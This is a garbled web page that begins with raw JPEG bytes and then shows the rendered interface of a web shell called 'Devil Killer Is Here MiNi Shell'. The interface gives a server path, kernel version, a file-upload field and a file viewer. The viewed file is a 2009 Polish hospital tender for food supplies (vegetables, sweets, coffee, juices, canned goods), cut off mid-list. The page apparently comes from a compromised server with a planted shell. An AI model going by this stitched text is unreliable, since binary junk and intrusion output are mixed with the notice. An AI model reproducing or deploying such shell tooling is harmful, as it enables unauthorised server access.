JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090223/36834-N-2009.html

<p class="kh_header"><b>Sosnowiec: Artukuły Spożywcze</b><br>
<b>Numer ogłoszenia: 36834 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny Nr 5 im. Św. Barbary w Sosnowcu , pl. Medyków 1, 41-200 Sosnowiec, woj. śląskie, tel. 032 3682012, 3682449, faks (032) 368 20 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> WWW.WSS5.PL</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Artukuły Spożywcze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Artykuły spożywcze - dokładny opis w II części.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy:
-	spełniający warunki określone w art. 22 ust. 1 ustawy, 
-	niewykluczeni na podstawie art. 24 ust. 1 i 2 ustawy,
-	którzy dołączą do oferty lub zgodnie z art. 26 ust. 3 ustawy uzupełnią w wyznaczonym 
przez zamawiającego terminie brakujące dokumenty lub oświadczenia, o których mowa 
w pkt 4 i 5  SIWZ lub uzupełnią dokumenty o których mowa w pkt. 4 i 5  zawierające błędy  

Zamawiający odrzuci ofertę, jeżeli:
- jest niezgodna z ustawą;
-  jej treść nie odpowiada treści SIWZ;
-  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu   
   nieuczciwej konkurencji;
-  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
-  została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie    
    zamówienia lub nie zaproszonego do składania ofert;
-  zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie  
   art. 88 ustawy, lub błędy w obliczeniu ceny;
-  wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na  
   poprawienie omyłki rachunkowej w obliczeniu ceny;
-  jest nieważna na podstawie odrębnych przepisów.

Zamawiający odrzuci ofertę wykonawcy, który zgodnie z art. 90 ust. 3 ustawy nie złoży wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdzi, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie, zgodne z art. 22 ust.1, pkt. 1-4 i art. 24  ustawy Prawo Zamówień Publicznych (można wykorzystać wzór  stanowiący załącznik nr 3 do SIWZ).
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert
Oświadczenie Wykonawcy o niezaleganiu w opłacaniu podatków, opłat oraz składek na  
ubezpieczenie zdrowotne i społeczne, lub oświadczenie o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności.
Koncesje, zezwolenie lub licencję lub oświadczenie Wykonawcy, że ustawy nie nakładają  obowiązku  posiadania  koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym  zamówieniem publicznym 

Wykaz dostaw wykonanych w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia 
z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie.
Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna  wykonanie 
w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie), przed dniem wszczęcia postępowania co najmniej trzech dostaw odpowiadających przedmiotowi niniejszego zamówienia.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 4.3, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości ( wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Zobowiązanie  Wykonawcy (wg wzoru stanowiącego załącznik nr 5 do SIWZ) do przestrzegania ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia.   
Oświadczenie, iż środki transportu, którymi dostarczana będzie żywność posiadają decyzję Stacji Sanitarno-Epidemiologicznej o dopuszczeniu do transportu  żywności i na każde wezwanie Wykonawca przedstawi ją Zamawiającemu.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - termin realizacji - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wss5.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki   Szpital Specjalistyczny nr 5 im św. Barbary w Sosnowcu, ul. Plac Medyków 1, 41-200 Sosnowiec pokój nr B-1-6 Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2009 godzina 10:00, miejsce: Wojewódzki   Szpital Specjalistyczny nr 5 im św. Barbary w Sosnowcu, ul. Plac Medyków 1, 41-200 Sosnowiec pokój nr D-1-1 Knacelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warzywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew korzeń	kg	220
Burak czerwony	kg	340
Pietruszka korzeń	kg	100
Seler korzeń	kg	100
Kapusta biała (główka)	kg	180
Kapusta czerwona (główka)	kg	70
Kapusta pekińska	kg	30
Cebula zaschnięta	kg	120
Czosnek	szt.	20
Por	szt.	25
Pietruszka zielona	szt.	40
Koperek zielony	szt.	180
Ziemniaki jadalne późne workowane 30-50kg	kg	4000
Ogórek kiszony	kg	55
Kapusta kiszona beczkowana	kg	145
Sałata zielona	szt.	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realiyacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mąka pszenna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MĄKA PSZENNA typ 500	kg	535.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realiyacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Żurek, jabłka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żurek	szt.	50
Jabłka	kg	170.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.21-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pieczarki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczarki	kg	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.60-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Owoce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banan	Kg	160
Pomidor	Kg	70
Pomarańcza	Kg	70
Kiwi	Kg	50
Mandarynka	Kg	70
Grapefruit czerwony	Kg	50
Jabłka	Kg	200
Cytryna	Kg	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tłuszcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej VITA	l	245
Olej z dodatkiem oliwy z oliwek	l	80
Margaryna zwykła	kg	180
Margaryna Palma	kg	80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.20.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Artykuły spożywcze - przyprawy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sól warzona biała	kg	170
Pieprz prawdziwy czarny mielony	kg	1,5
Kwasek cytrynowy	kg	1
Ziele angielskie	kg	0,25
Majeranek	kg	1
Lisć laurowy	kg	0,2
Papryka słodka mielona	kg	0,5
Przyprawa do ryb 	kg	0,5
Przyprawa do potraw Kucharek	kg	20
Przyprawa w płynie op. 1 5 l	l	35
Ocet spirytusowy 6% 10%0,5 l but.	szt.	15.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Słodycze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Alpen czekolady 100g - różne	SZT	200
Alpen czekolady 200g - różne	SZT	200
Aromat Harry orzeszki 150g	SZT	60
Bahlsen krakuski 200g - różne	SZT	120
Baron bomb. Chocolate hearts 250g	SZT	30
Cadb batony Pawełki 45g - różne	SZT	120
Cadb bomb. Baryłki 200g	SZT	30
Cadb czekolady 100g - różne 	SZT	120
Cadb halls 33,5g - różne	SZT	90
Danone delicje 147g	SZT	120
Danone delicje impresje 128g	SZT	120
Danone pierniki 160g	SZT	120
Ferrer jaja kinder 72szt	SZT	120
Ferrer raffaello 150g	SZT	60
Ferrer raffaello kufer 240g	SZT	60
Ferrer rocher 200g	SZT	60
Ferrer tic-tac 16g - różne	SZT	300
Flis karpatka  - różne smaki	Kg	6
Goplan Ice 90g	SZT	120
Hanka Michałki - luz	Kg	8
Jutrzenka wafle familijne 180g	SZT	300
Jutrzenka orzechy laskowe w czekol 80g	SZT	120
Jutrzenka rodzynki w czekol  80g	SZT	120
Kalisz grześki mega 50g	SZT	120
Kalisz grześki 39g	SZT	120
Kalisz grześki noblew 28g	SZT	120
Leaf Ice cool... 100g	SZT	120
Leaf landryny 100g	SZT	120
Master baton bounty 57g	SZT	200
Master baton mars delight 36g	SZT	200
Master baton mars single 48g	SZT	200
Master baton milky way 36g	SZT	200
Master baton snickers 55g	SZT	200
Master baton snickers crun 40g	SZT	200
Master baton snickers super 85g	SZT	200
Master baton twix 51g	SZT	200
Master baton M & M  53g	SZT	200
Master mini mars, snickers, bounty - luz	Kg	10
Mieszko zozole - luz	Kg	10
Milka czekolady 100g	SZT	200
Milka czekolady 200g	SZT	200
Milka czekolady 250g	SZT	200
Milka alpejski mleczko 400g	SZT	60
Nestle Princessa gold 32g	SZT	200
Nestle Princessa lekko muśnieta 22g	SZT	120
Nestle Princessa maxi 49g	SZT	200
Nestle Princessa 37g	SZT	200
Odra chałwa 20g	SZT	120
Odra chałwa 50g	SZT	120
Odra chałwa 100g	SZT	120
Odra galaretka wielosmakowa - luz	Kg	10
Pszczó kukułka - luz	Kg	12
Pszczó raczki - luz	Kg	12
San biszkopty 140g	SZT	120
San biszkopty petitki 120g	SZT	120
San łakotki 178g	SZT	120
San petitki 85g	SZT	120
San petitki w czekoladzie 55g 	SZT	120
Skawa draże 70g	SZT	120
Solid. bomb czekoladowe kreacje 245g	SZT	30
Solid. bomb lamour 165g	SZT	30
Solid. bomb wiśnie w likierze 206g	SZT	30
Solid. bomb złoty adwokat 205g	SZT	30
Solid. bomb Merci 250g	SZT	60
Solid. bomb Merci Exclusive 400g	SZT	60
Solid. bomb Toffifee 125g	SZT	60
Solid. bomb Toffifee 400g	SZT	60
Solid. Złoty adwokat - luz	Kg	5
Solid. Złoty orzech - luz	Kg	5
Solid. Ciasteczka 160g	SZT	60
Solid. Ciasteczka bc 125g	SZT	60
Tago wafle chałwowe - luz	Kg	5
Van ma mentos 38g - różne	SZT	120
Wawel czekolady 100g	SZT	120
Wawel karmelki light 80g - rózne	SZT	120
Wawel wafle light 80g - rózne	SZT	120
Wringl. Gumy drażetki 14g - różne	SZT	200
Wringl. Gumy listki - różne	SZT	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.23.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Herbaty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Saga 20tor.	SZT	144
Saga - różne smaki 25tor.	SZT	70
Lipton piramidki - różne smaki 	SZT	120
Lipton 25tor.	SZT	60
Lipton 100tor	SZT	10
Bastek earl grey 125g	SZT	60
Bastek  - różne smaki 20tor	SZT	60
Bastek herbata zielona - rózne smaki 100g	SZT	60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kawy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mokate cappucino -  różne smaki	SZT	200
Jacobs aroma rozp 100g	SZT	60
Jacobs aroma miel 250g	SZT	60
Jacobs Balance rozp 100g	SZT	60
Jacobs Cronat Gold rozp 50g	SZT	60
Jacobs Cronat Gold rozp 100g	SZT	60
Jacobs Cronat Gold miel 100g	SZT	60
Jacobs Cronat Gold  miel 250g	SZT	60
Jacobs Cronat Gold miel 500g	SZT	60
Jacobs Cronat Gold 3 w1	SZT	150
Jacobs Kronung rozp 50g	SZT	60
Jacobs Kronung rozp 100g	SZT	60
Jacobs Kronung miel 100g	SZT	60
Jacobs Kronung miel 250g	SZT	60
Jacobs Kronung miel 500g	SZT	60
Jacobs Maxwell House rozp 50g	SZT	60
Jacobs Maxwell House rozp 100g	SZT	60
Jacobs Maxwell House miel 250g	SZT	60
Jacobs Maxwell House delikat rozp 100g	SZT	60
Jacobs 2w1	SZT	300
Jacobs 3w1	SZT	300
Jacobs caffe c milka 22g	SZT	150
Nescafe 50g	SZT	60
Nescafe 100g	SZT	60
Nescafe 200g	SZT	60
Nescafe 2g	SZT	600
Nescafe 2w1	SZT	600
Nescafe 3w1	SZT	600.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.10.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zupki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Knorr NUDLE - różne smaki	SZT	120
Knorr XXL - rózne smaki	SZT	100
Knorr gorący kubek - różne smaki	SZT	1280
Vifon - różne smaki	SZT	144.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.10-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Soki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tymbark napoje 0,25l (różne smaki)	SZT	1000
Tymbark owal 0,25l (różne smaki)	SZT	600
Tymbark soki 1l (różne smaki)	SZT	400
Tarczyn 0,33l (różne smaki)	SZT	800
Tarczyn 1l (różne smaki)	SZT	400
Kubuś 0,33l (różne smaki)	SZT	400
Kubuś Play (różne smaki)	SZT	260
Kubuś 1l (różne smaki)	SZT	180
Soki Hortex 0,2l (różne smaki)	SZT	240
Soki Hortex 1l (różne smaki)	SZT	800
Soki Caprio 2l (różne smaki)	SZT	300
Tymbark owoce świata 1l	SZT	300
Tymbark aseptic	SZT	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Ryby puszkowane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Big. Paprykarz szczeciński 160g	SZT	120
King. Sałatka neptun 160g	SZT	120
King. Sałatka pikantna z makreli 160g	SZT	120
King Filet śledziowy w pomidorach 170g	SZT	120
King Filet śledziowy w oleju 170g	SZT	120
King Filet z makreli w oleju 170g	SZT	120
King Filet z makreli w pomidorach 170g	SZT	120
King śledź po gdańsku170g	SZT	120
King śledź w pomidorach 170g	SZT	120
King szprot w pomidorach 170g	SZT	120
King szprot w oleju 170g	SZT	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Konserwy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Werbl. Boczek mielony - kubek	SZT	100
werbl. Golonka - kubek	SZT	100
Werbl. Smalec z mięsem- kubek	SZT	100
Werbl. Szynka drobiowa- 110g	SZT	100
Werbl. Szynka mielona - 135g	SZT	100
Werbl. Szynka polska - kubek	SZT	100
Werbl. Turystyczna konserwa- kubek	SZT	100
Werbl. Tyrolska - kubek	SZT	100
